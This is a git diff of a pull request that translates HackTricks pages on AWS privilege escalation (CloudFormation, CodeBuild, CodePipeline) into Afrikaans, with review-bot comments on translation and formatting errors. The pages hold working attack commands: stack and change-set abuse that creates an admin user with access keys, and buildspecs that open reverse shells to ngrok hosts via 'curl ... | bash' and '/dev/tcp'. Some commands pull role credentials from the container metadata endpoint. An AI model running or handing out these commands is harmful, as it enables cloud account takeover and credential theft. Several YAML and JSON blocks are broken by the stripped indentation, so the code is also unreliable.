### `iam:PassRole`, (`cloudformation:UpdateStack` | `cloudformation:SetStackPolicy`) -In this case you can a**buse an existing cloudformation stack** to update it and escalate privileges as in the previous scenario: - +In hierdie geval kan jy 'n **bestaande cloudformation stapel** misbruik om dit op te dateer en voorregte te verhoog soos in die vorige scenario: ```bash aws cloudformation update-stack \ - --stack-name privesc \ - --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ - --role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \ - --capabilities CAPABILITY_IAM \ - --region eu-west-1 +--stack-name privesc \ +--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ +--role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \ +--capabilities CAPABILITY_IAM \ +--region eu-west-1 ``` +Die `cloudformation:SetStackPolicy` toestemming kan gebruik word om **jouself `UpdateStack` toestemming** oor 'n stapel te gee en die aanval uit te voer. -The `cloudformation:SetStackPolicy` permission can be used to **give yourself `UpdateStack` permission** over a stack and perform the attack. - -**Potential Impact:** Privesc to the cloudformation service role specified. +**PotensiĂ«le Impak:** Privesc na die cloudformation diensrol gespesifiseer. ### `cloudformation:UpdateStack` | `cloudformation:SetStackPolicy` -If you have this permission but **no `iam:PassRole`** you can still **update the stacks** used and abuse the **IAM Roles they have already attached**. Check the previous section for exploit example (just don't indicate any role in the update). +As jy hierdie toestemming het maar **geen `iam:PassRole`** nie, kan jy steeds **die stapels** wat gebruik word opdateer en die **IAM Rolle wat hulle reeds aangeheg het** misbruik. Kyk na die vorige afdeling vir 'n eksploit voorbeeld (moet net nie enige rol in die opdatering aandui nie). 
-The `cloudformation:SetStackPolicy` permission can be used to **give yourself `UpdateStack` permission** over a stack and perform the attack. +Die `cloudformation:SetStackPolicy` toestemming kan gebruik word om **jouself `UpdateStack` toestemming** oor 'n stapel te gee en die aanval uit te voer. -**Potential Impact:** Privesc to the cloudformation service role already attached. +**PotensiĂ«le Impak:** Privesc na die cloudformation diensrol wat reeds aangeheg is. ### `iam:PassRole`,((`cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet`) | `cloudformation:SetStackPolicy`) -An attacker with permissions to **pass a role and create & execute a ChangeSet** can **create/update a new cloudformation stack abuse the cloudformation service roles** just like with the CreateStack or UpdateStack. - -The following exploit is a **variation of the**[ **CreateStack one**](./#iam-passrole-cloudformation-createstack) using the **ChangeSet permissions** to create a stack. +'n Aanvaller met toestemmings om **'n rol oor te dra en 'n ChangeSet te skep & uit te voer** kan **'n nuwe cloudformation stapel skep/opdateer en die cloudformation diensrolle misbruik** net soos met die CreateStack of UpdateStack. +Die volgende eksploit is 'n **variasie van die**[ **CreateStack een**](./#iam-passrole-cloudformation-createstack) wat die **ChangeSet toestemmings** gebruik om 'n stapel te skep. 
```bash aws cloudformation create-change-set \ - --stack-name privesc \ - --change-set-name privesc \ - --change-set-type CREATE \ - --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ - --role arn:aws:iam::947247140022:role/CloudFormationAdmin \ - --capabilities CAPABILITY_IAM \ - --region eu-west-1 +--stack-name privesc \ +--change-set-name privesc \ +--change-set-type CREATE \ +--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ +--role arn:aws:iam::947247140022:role/CloudFormationAdmin \ +--capabilities CAPABILITY_IAM \ +--region eu-west-1 echo "Waiting 2 mins to change the stack" sleep 120 aws cloudformation execute-change-set \ - --change-set-name privesc \ - --stack-name privesc \ - --region eu-west-1 +--change-set-name privesc \ +--stack-name privesc \ +--region eu-west-1 echo "Waiting 2 mins to execute the stack" sleep 120 aws cloudformation describe-stacks \ - --stack-name privesc \ - --region eu-west-1 +--stack-name privesc \ +--region eu-west-1 ``` +Die `cloudformation:SetStackPolicy` toestemming kan gebruik word om **vir jouself `ChangeSet` toestemmings** oor 'n stap te gee en die aanval uit te voer. -The `cloudformation:SetStackPolicy` permission can be used to **give yourself `ChangeSet` permissions** over a stack and perform the attack. - -**Potential Impact:** Privesc to cloudformation service roles. +**PotensiĂ«le Impak:** Privesc na cloudformation diensrolle. ### (`cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet`) | `cloudformation:SetStackPolicy`) -This is like the previous method without passing **IAM roles**, so you can just **abuse already attached ones**, just modify the parameter: - +Dit is soos die vorige metode sonder om **IAM rolle** oor te dra, so jy kan net **alreeds aangehegte eenhede misbruik**, net die parameter aanpas: ``` --change-set-type UPDATE ``` - -**Potential Impact:** Privesc to the cloudformation service role already attached. 
+**PotensiĂ«le Impak:** Privesc na die cloudformation diensrol wat reeds aangeheg is. ### `iam:PassRole`,(`cloudformation:CreateStackSet` | `cloudformation:UpdateStackSet`) -An attacker could abuse these permissions to create/update StackSets to abuse arbitrary cloudformation roles. +'n Aanvaller kan hierdie toestemmings misbruik om StackSets te skep/op te dateer om arbitrĂȘre cloudformation rolle te misbruik. -**Potential Impact:** Privesc to cloudformation service roles. +**PotensiĂ«le Impak:** Privesc na cloudformation diensrolle. ### `cloudformation:UpdateStackSet` -An attacker could abuse this permission without the passRole permission to update StackSets to abuse the attached cloudformation roles. +'n Aanvaller kan hierdie toestemming misbruik sonder die passRole toestemming om StackSets op te dateer om die aangehegte cloudformation rolle te misbruik. -**Potential Impact:** Privesc to the attached cloudformation roles. +**PotensiĂ«le Impak:** Privesc na die aangehegte cloudformation rolle. -## References +## Verwysings - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md index d41f9062c..c2b491f1f 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md 
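Review bot: In the cloudformation README hunk (@@ -12,111) two translated sentences change meaning: `oor 'n stap te gee` renders "stack" as `stap` (step) where the rest of the hunk uses `stapel`, and `alreeds aangehegte eenhede misbruik` turns "abuse already attached ones" into "abuse already attached units"; suggest `oor 'n stapel te gee` and `reeds aangehegte rolle misbruik`. Since the `update-stack` and `create-change-set` command lines are rewritten anyway, `--role arn:aws:iam::...` should become `--role-arn`, matching the `create-stack` example earlier in this hunk. The rewrite also strips the leading indentation from every continuation line (`+--template-url ...`, `+--role ...`, `+--capabilities CAPABILITY_IAM \`); a translation PR should leave fenced code byte-for-byte identical to the source.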
@@ -2,84 +2,74 @@ {{#include ../../../../banners/hacktricks-training.md}} -An attacker could for example use a **cloudformation template** that generates **keys for an admin** user like: - +'n Aanvaller kan byvoorbeeld 'n **cloudformation-sjabloon** gebruik wat **sleutels vir 'n admin** gebruiker genereer soos: ```json { - "Resources": { - "AdminUser": { - "Type": "AWS::IAM::User" - }, - "AdminPolicy": { - "Type": "AWS::IAM::ManagedPolicy", - "Properties": { - "Description": "This policy allows all actions on all resources.", - "PolicyDocument": { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": ["*"], - "Resource": "*" - } - ] - }, - "Users": [ - { - "Ref": "AdminUser" - } - ] - } - }, - "MyUserKeys": { - "Type": "AWS::IAM::AccessKey", - "Properties": { - "UserName": { - "Ref": "AdminUser" - } - } - } - }, - "Outputs": { - "AccessKey": { - "Value": { - "Ref": "MyUserKeys" - }, - "Description": "Access Key ID of Admin User" - }, - "SecretKey": { - "Value": { - "Fn::GetAtt": ["MyUserKeys", "SecretAccessKey"] - }, - "Description": "Secret Key of Admin User" - } - } +"Resources": { +"AdminUser": { +"Type": "AWS::IAM::User" +}, +"AdminPolicy": { +"Type": "AWS::IAM::ManagedPolicy", +"Properties": { +"Description": "This policy allows all actions on all resources.", +"PolicyDocument": { +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Action": ["*"], +"Resource": "*" +} +] +}, +"Users": [ +{ +"Ref": "AdminUser" +} +] +} +}, +"MyUserKeys": { +"Type": "AWS::IAM::AccessKey", +"Properties": { +"UserName": { +"Ref": "AdminUser" +} +} +} +}, +"Outputs": { +"AccessKey": { +"Value": { +"Ref": "MyUserKeys" +}, +"Description": "Access Key ID of Admin User" +}, +"SecretKey": { +"Value": { +"Fn::GetAtt": ["MyUserKeys", "SecretAccessKey"] +}, +"Description": "Secret Key of Admin User" +} +} } ``` - -Then **generate the cloudformation stack**: - +Dan **genereer die cloudformation stap**: ```bash aws cloudformation create-stack 
--stack-name privesc \ - --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ - --role arn:aws:iam::[REDACTED]:role/adminaccess \ - --capabilities CAPABILITY_IAM --region us-west-2 +--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ +--role arn:aws:iam::[REDACTED]:role/adminaccess \ +--capabilities CAPABILITY_IAM --region us-west-2 ``` - -**Wait for a couple of minutes** for the stack to be generated and then **get the output** of the stack where the **credentials are stored**: - +**Wag vir 'n paar minute** vir die stap om gegenereer te word en dan **kry die uitvoer** van die stap waar die **bewyse gestoor word**: ```bash aws cloudformation describe-stacks \ - --stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \ - --region uswest-2 +--stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \ +--region uswest-2 ``` - -### References +### Verwysings - [https://bishopfox.com/blog/privilege-escalation-in-aws](https://bishopfox.com/blog/privilege-escalation-in-aws) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md index b179bec22..7483fb8d0 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md @@ -4,7 +4,7 @@ ## codebuild -Get more info in: +Kry meer inligting in: {{#ref}} ../aws-services/aws-codebuild-enum.md 
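Review bot: In the iam-passrole-cloudformation-createstack-and-cloudformation-describestacks hunk (@@ -2,84), "stack" is again translated as `stap` (step) in `Dan **genereer die cloudformation stap**` and `Wag vir 'n paar minute vir die stap`; use `stapel`, and replace `bewyse` (evidence) with `geloofsbriewe` for "credentials", the term the codepipeline page in this same PR uses. The `+` lines of the `describe-stacks` command carry over two typos that should be fixed while the lines are touched: `--region uswest-2` and the ARN region `us-west2` (the `create-stack` command above uses `us-west-2`). The JSON template block also lost all indentation; it still parses, but the nested `Resources`/`Outputs` structure is no longer readable, and no translation happens inside it, so those lines should not be in the diff at all.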
@@ -12,70 +12,65 @@ Get more info in: ### `codebuild:StartBuild` | `codebuild:StartBuildBatch` -Only with one of these permissions it's enough to trigger a build with a new buildspec and steal the token of the iam role assigned to the project: +Slegs met een van hierdie toestemmings is dit genoeg om 'n bou te aktiveer met 'n nuwe buildspec en die token van die iam rol wat aan die projek toegeken is, te steel: {{#tabs }} {{#tab name="StartBuild" }} - ```bash cat > /tmp/buildspec.yml < --buildspec-override file:///tmp/buildspec.yml ``` - {{#endtab }} {{#tab name="StartBuildBatch" }} - ```bash cat > /tmp/buildspec.yml < --buildspec-override file:///tmp/buildspec.yml ``` - {{#endtab }} {{#endtabs }} -**Note**: The difference between these two commands is that: +**Let wel**: Die verskil tussen hierdie twee opdragte is dat: -- `StartBuild` triggers a single build job using a specific `buildspec.yml`. -- `StartBuildBatch` allows you to start a batch of builds, with more complex configurations (like running multiple builds in parallel). +- `StartBuild` aktiveer 'n enkele bouwerk met 'n spesifieke `buildspec.yml`. +- `StartBuildBatch` laat jou toe om 'n batch van bouwerke te begin, met meer komplekse konfigurasies (soos om verskeie bouwerke gelyktydig te laat loop). -**Potential Impact:** Direct privesc to attached AWS Codebuild roles. +**PotensiĂ«le Impak:** Direkte privesc na aangehegte AWS Codebuild rolle. ### `iam:PassRole`, `codebuild:CreateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`) -An attacker with the **`iam:PassRole`, `codebuild:CreateProject`, and `codebuild:StartBuild` or `codebuild:StartBuildBatch`** permissions would be able to **escalate privileges to any codebuild IAM role** by creating a running one. 
+'n Aanvaller met die **`iam:PassRole`, `codebuild:CreateProject`, en `codebuild:StartBuild` of `codebuild:StartBuildBatch`** toestemmings sal in staat wees om **privileges te eskaleer na enige codebuild IAM rol** deur 'n lopende een te skep. {{#tabs }} {{#tab name="Example1" }} - ```bash # Enumerate then env and get creds REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" @@ -84,20 +79,20 @@ REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATI REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash" JSON="{ - \"name\": \"codebuild-demo-project\", - \"source\": { - \"type\": \"NO_SOURCE\", - \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" - }, - \"artifacts\": { - \"type\": \"NO_ARTIFACTS\" - }, - \"environment\": { - \"type\": \"LINUX_CONTAINER\", - \"image\": \"aws/codebuild/standard:1.0\", - \"computeType\": \"BUILD_GENERAL1_SMALL\" - }, - \"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\" +\"name\": \"codebuild-demo-project\", +\"source\": { +\"type\": \"NO_SOURCE\", +\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" +}, +\"artifacts\": { +\"type\": \"NO_ARTIFACTS\" +}, +\"environment\": { +\"type\": \"LINUX_CONTAINER\", +\"image\": \"aws/codebuild/standard:1.0\", +\"computeType\": \"BUILD_GENERAL1_SMALL\" +}, +\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\" }" 
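Review bot: In the codebuild hunk @@ -84,20 the `JSON="{ ... }"` block in the `Example1` tab is changed only to remove indentation; nothing in it is translated, so the `-`/`+` pairs should be dropped and the block kept identical to the English source (the embedded `buildspec` string with its `\\\\n` escapes is easy to break by hand edits, and a reviewer cannot diff it for correctness once the surrounding layout changes). Also note the tab label `Example1` in the preceding hunk is left in English; whatever convention is chosen for tab labels should be applied to both tabs of this section.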
@@ -117,19 +112,17 @@ aws codebuild start-build --project-name codebuild-demo-project # Delete the project aws codebuild delete-project --name codebuild-demo-project ``` - {{#endtab }} -{{#tab name="Example2" }} - +{{#tab name="Voorbeeld2" }} ```bash # Generated by AI, not tested # Create a buildspec.yml file with reverse shell command echo 'version: 0.2 phases: - build: - commands: - - curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash' > buildspec.yml +build: +commands: +- curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash' > buildspec.yml # Upload the buildspec to the bucket and give access to everyone aws s3 cp buildspec.yml s3:/buildspec.yml 
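Review bot: In hunk @@ -117,19 the `echo 'version: 0.2 ...' > buildspec.yml` snippet is broken by the indentation removal: `build:` and `commands:` are now at the same level as `phases:`, so `phases` is empty and the file no longer defines a build phase; CodeBuild will reject it. Restore the original nesting (`phases:` / `  build:` / `    commands:`). The tab name is also changed from `Example2` to `Voorbeeld2` while `Example1` above stays English; pick one convention for tab labels.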
@@ -141,25 +134,23 @@ aws codebuild create-project --name reverse-shell-project --source type=S3,locat aws codebuild start-build --project-name reverse-shell-project ``` - {{#endtab }} {{#endtabs }} -**Potential Impact:** Direct privesc to any AWS Codebuild role. +**PotensiĂ«le Impak:** Direkte privesc na enige AWS Codebuild rol. > [!WARNING] -> In a **Codebuild container** the file `/codebuild/output/tmp/env.sh` contains all the env vars needed to access the **metadata credentials**. +> In 'n **Codebuild-container** bevat die lĂȘer `/codebuild/output/tmp/env.sh` al die omgewing veranderlikes wat nodig is om toegang te verkry tot die **metadata-akkrediteerings**. -> This file contains the **env variable `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** which contains the **URL path** to access the credentials. It will be something like this `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420` +> Hierdie lĂȘer bevat die **omgewing veranderlike `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** wat die **URL-pad** bevat om toegang tot die akkrediteerings te verkry. Dit sal iets soos hierdie wees `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420` -> Add that to the URL **`http://169.254.170.2/`** and you will be able to dump the role credentials. +> Voeg dit by die URL **`http://169.254.170.2/`** en jy sal in staat wees om die rol akkrediteerings te dump. -> Moreover, it also contains the **env variable `ECS_CONTAINER_METADATA_URI`** which contains the complete URL to get **metadata info about the container**. +> Boonop bevat dit ook die **omgewing veranderlike `ECS_CONTAINER_METADATA_URI`** wat die volledige URL bevat om **metadata-inligting oor die container** te verkry. 
### `iam:PassRole`, `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`) -Just like in the previous section, if instead of creating a build project you can modify it, you can indicate the IAM Role and steal the token - +Net soos in die vorige afdeling, as jy in plaas daarvan om 'n bouprojek te skep, dit kan wysig, kan jy die IAM Rol aandui en die token steel. ```bash REV_PATH="/tmp/codebuild_pwn.json" @@ -171,20 +162,20 @@ REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash" # You need to indicate the name of the project you want to modify JSON="{ - \"name\": \"\", - \"source\": { - \"type\": \"NO_SOURCE\", - \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" - }, - \"artifacts\": { - \"type\": \"NO_ARTIFACTS\" - }, - \"environment\": { - \"type\": \"LINUX_CONTAINER\", - \"image\": \"aws/codebuild/standard:1.0\", - \"computeType\": \"BUILD_GENERAL1_SMALL\" - }, - \"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\" +\"name\": \"\", +\"source\": { +\"type\": \"NO_SOURCE\", +\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" +}, +\"artifacts\": { +\"type\": \"NO_ARTIFACTS\" +}, +\"environment\": { +\"type\": \"LINUX_CONTAINER\", +\"image\": \"aws/codebuild/standard:1.0\", +\"computeType\": \"BUILD_GENERAL1_SMALL\" +}, +\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\" }" printf "$JSON" > $REV_PATH 
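Review bot: In hunk @@ -141,25 "credentials" is rendered as `metadata-akkrediteerings` and `rol akkrediteerings`, while the cloudformation page in this PR uses `bewyse` and the codepipeline page uses `geloofsbriewe`; standardise on `geloofsbriewe` across the PR. In the same warning block `omgewing veranderlikes` should be the single compound `omgewingsveranderlikes`, and the ECS metadata URL path `/v2/credentials/...` and variable names `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI` / `ECS_CONTAINER_METADATA_URI` are correctly left untranslated, which is the convention the rest of the PR should follow for identifiers.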
@@ -193,16 +184,14 @@ aws codebuild update-project --cli-input-json file://$REV_PATH aws codebuild start-build --project-name codebuild-demo-project ``` - -**Potential Impact:** Direct privesc to any AWS Codebuild role. +**PotensiĂ«le Impak:** Direkte privesc na enige AWS Codebuild rol. ### `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`) -Like in the previous section but **without the `iam:PassRole` permission**, you can abuse this permissions to **modify existing Codebuild projects and access the role they already have assigned**. +Soos in die vorige afdeling, maar **sonder die `iam:PassRole` toestemming**, kan jy hierdie toestemmings misbruik om **bestaande Codebuild projekte te wysig en toegang te verkry tot die rol wat hulle reeds toegeken het**. {{#tabs }} {{#tab name="StartBuild" }} - ```sh REV_PATH="/tmp/codebuild_pwn.json" 
@@ -213,20 +202,20 @@ REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATI REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh" JSON="{ - \"name\": \"\", - \"source\": { - \"type\": \"NO_SOURCE\", - \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" - }, - \"artifacts\": { - \"type\": \"NO_ARTIFACTS\" - }, - \"environment\": { - \"type\": \"LINUX_CONTAINER\", - \"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\", - \"computeType\": \"BUILD_GENERAL1_SMALL\", - \"imagePullCredentialsType\": \"CODEBUILD\" - } +\"name\": \"\", +\"source\": { +\"type\": \"NO_SOURCE\", +\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" +}, +\"artifacts\": { +\"type\": \"NO_ARTIFACTS\" +}, +\"environment\": { +\"type\": \"LINUX_CONTAINER\", +\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\", +\"computeType\": \"BUILD_GENERAL1_SMALL\", +\"imagePullCredentialsType\": \"CODEBUILD\" +} }" # Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild! @@ -237,11 +226,9 @@ aws codebuild update-project --cli-input-json file://$REV_PATH aws codebuild start-build --project-name codebuild-demo-project ``` - {{#endtab }} {{#tab name="StartBuildBatch" }} - ```sh REV_PATH="/tmp/codebuild_pwn.json" 
@@ -250,20 +237,20 @@ REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh" # You need to indicate the name of the project you want to modify JSON="{ - \"name\": \"project_name\", - \"source\": { - \"type\": \"NO_SOURCE\", - \"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n fast-fail: false\\\\n build-list:\\\\n - identifier: build1\\\\n env:\\\\n variables:\\\\n BUILD_ID: build1\\\\n buildspec: |\\\\n version: 0.2\\\\n env:\\\\n shell: sh\\\\n phases:\\\\n build:\\\\n commands:\\\\n - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n ignore-failure: true\\\\n\" - }, - \"artifacts\": { - \"type\": \"NO_ARTIFACTS\" - }, - \"environment\": { - \"type\": \"LINUX_CONTAINER\", - \"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\", - \"computeType\": \"BUILD_GENERAL1_SMALL\", - \"imagePullCredentialsType\": \"CODEBUILD\" - } +\"name\": \"project_name\", +\"source\": { +\"type\": \"NO_SOURCE\", +\"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n fast-fail: false\\\\n build-list:\\\\n - identifier: build1\\\\n env:\\\\n variables:\\\\n BUILD_ID: build1\\\\n buildspec: |\\\\n version: 0.2\\\\n env:\\\\n shell: sh\\\\n phases:\\\\n build:\\\\n commands:\\\\n - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n ignore-failure: true\\\\n\" +}, +\"artifacts\": { +\"type\": \"NO_ARTIFACTS\" +}, +\"environment\": { +\"type\": \"LINUX_CONTAINER\", +\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\", +\"computeType\": \"BUILD_GENERAL1_SMALL\", +\"imagePullCredentialsType\": \"CODEBUILD\" +} }" printf "$JSON" > $REV_PATH 
@@ -274,41 +261,37 @@ aws codebuild update-project --cli-input-json file://$REV_PATH aws codebuild start-build-batch --project-name codebuild-demo-project ``` - {{#endtab }} {{#endtabs }} -**Potential Impact:** Direct privesc to attached AWS Codebuild roles. +**PotensiĂ«le Impak:** Direkte privesc na aangehegte AWS Codebuild rolle. ### SSM -Having **enough permissions to start a ssm session** it's possible to get **inside a Codebuild project** being built. +Om **genoeg regte te hĂȘ om 'n ssm-sessie te begin** is dit moontlik om **binne 'n Codebuild-projek** wat gebou word, te kom. -The codebuild project will need to have a breakpoint: +Die codebuild-projek sal 'n breekpunt moet hĂȘ:
phases:
-  pre_build:
-    commands:
-      - echo Entered the pre_build phase...
-      - echo "Hello World" > /tmp/hello-world
+pre_build:
+commands:
+- echo Betree die pre_build fase...
+- echo "Hello World" > /tmp/hello-world
       - codebuild-breakpoint
 
-And then: - +En dan: ```bash aws codebuild batch-get-builds --ids --region --output json aws ssm start-session --target --region ``` - For more info [**check the docs**](https://docs.aws.amazon.com/codebuild/latest/userguide/session-manager.html). ### (`codebuild:StartBuild` | `codebuild:StartBuildBatch`), `s3:GetObject`, `s3:PutObject` -An attacker able to start/restart a build of a specific CodeBuild project which stores its `buildspec.yml` file on an S3 bucket the attacker has write access to, can obtain command execution in the CodeBuild process. - -Note: the escalation is relevant only if the CodeBuild worker has a different role, hopefully more privileged, than the one of the attacker. +'n Aanvaller wat in staat is om 'n spesifieke CodeBuild-projek se bou te begin/herbegin wat sy `buildspec.yml`-lĂȘer op 'n S3-bucket stoor waartoe die aanvaller skryfrechten het, kan opdragte uitvoer in die CodeBuild-proses verkry. +Let wel: die eskalasie is slegs relevant as die CodeBuild-werker 'n ander rol het, hoopvol meer bevoorreg, as diĂ© van die aanvaller. ```bash aws s3 cp s3:///buildspec.yml ./ 
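Review bot: In hunk @@ -274,41 the YAML breakpoint snippet is now invalid: the `+pre_build:` and `+commands:` lines lost their indentation, but the unchanged context line `      - codebuild-breakpoint` keeps its original six-space indent, so the command list is split across two indentation levels and `pre_build` is no longer nested under `phases`. The echo text was also translated inside a command (`+- echo Betree die pre_build fase...`); strings in code blocks should stay as in the source. Further down, `skryfrechten` is Dutch, the Afrikaans is `skryfregte`, and the context line `For more info [**check the docs**]` is left in English while the paragraphs around it are translated.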
@@ -325,29 +308,22 @@ aws codebuild start-build --project-name # Wait for the reverse shell :) ``` - -You can use something like this **buildspec** to get a **reverse shell**: - +Jy kan iets soos hierdie **buildspec** gebruik om 'n **reverse shell** te kry: ```yaml:buildspec.yml version: 0.2 phases: - build: - commands: - - bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1 +build: +commands: +- bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1 ``` - -**Impact:** Direct privesc to the role used by the AWS CodeBuild worker that usually has high privileges. +**Impak:** Direkte privesc na die rol wat deur die AWS CodeBuild werker gebruik word, wat gewoonlik hoĂ« bevoegdhede het. > [!WARNING] -> Note that the buildspec could be expected in zip format, so an attacker would need to download, unzip, modify the `buildspec.yml` from the root directory, zip again and upload +> Let daarop dat die buildspec in zip-formaat verwag kan word, so 'n aanvaller sal moet aflaai, uitpak, die `buildspec.yml` vanaf die wortelgids wysig, weer zip en oplaai. -More details could be found [here](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/). +Meer besonderhede kan [hier](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/) gevind word. -**Potential Impact:** Direct privesc to attached AWS Codebuild roles. +**PotensiĂ«le Impak:** Direkte privesc na aangehegte AWS Codebuild rolle. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md index 0662ae9e2..8ebad76f5 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md 
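Review bot: In hunk @@ -325,29 the `buildspec.yml` example loses its indentation, which changes the YAML: `build:` and `commands:` become top-level keys beside `phases:` instead of being nested under it, so CodeBuild would not run the `bash -i >& /dev/tcp/...` command at all. Keep the original `phases:` / `  build:` / `    commands:` nesting; the fenced block contains nothing to translate and should not appear in the diff.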
@@ -4,7 +4,7 @@ ## codepipeline -For more info about codepipeline check: +Vir meer inligting oor codepipeline, kyk: {{#ref}} ../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md 
@@ -12,13 +12,13 @@ For more info about codepipeline check: ### `iam:PassRole`, `codepipeline:CreatePipeline`, `codebuild:CreateProject, codepipeline:StartPipelineExecution` -When creating a code pipeline you can indicate a **codepipeline IAM Role to run**, therefore you could compromise them. +Wanneer jy 'n code pipeline skep, kan jy 'n **codepipeline IAM Rol om te loop** aandui, daarom kan jy hulle kompromenteer. -Apart from the previous permissions you would need **access to the place where the code is stored** (S3, ECR, github, bitbucket...) +Behalwe vir die vorige toestemmings, sal jy **toegang tot die plek waar die kode gestoor word** benodig (S3, ECR, github, bitbucket...) -I tested this doing the process in the web page, the permissions indicated previously are the not List/Get ones needed to create a codepipeline, but for creating it in the web you will also need: `codebuild:ListCuratedEnvironmentImages, codebuild:ListProjects, codebuild:ListRepositories, codecommit:ListRepositories, events:PutTargets, codepipeline:ListPipelines, events:PutRule, codepipeline:ListActionTypes, cloudtrail:` +Ek het dit getoets deur die proses op die webblad te doen, die toestemmings wat voorheen aangedui is, is nie die Lys/Kry een wat benodig word om 'n codepipeline te skep nie, maar om dit op die web te skep, sal jy ook nodig hĂȘ: `codebuild:ListCuratedEnvironmentImages, codebuild:ListProjects, codebuild:ListRepositories, codecommit:ListRepositories, events:PutTargets, codepipeline:ListPipelines, events:PutRule, codepipeline:ListActionTypes, cloudtrail:` -During the **creation of the build project** you can indicate a **command to run** (rev shell?) and to run the build phase as **privileged user**, that's the configuration the attacker needs to compromise: +Tydens die **skepping van die bouprojek** kan jy 'n **opdrag om te loop** aandui (rev shell?) 
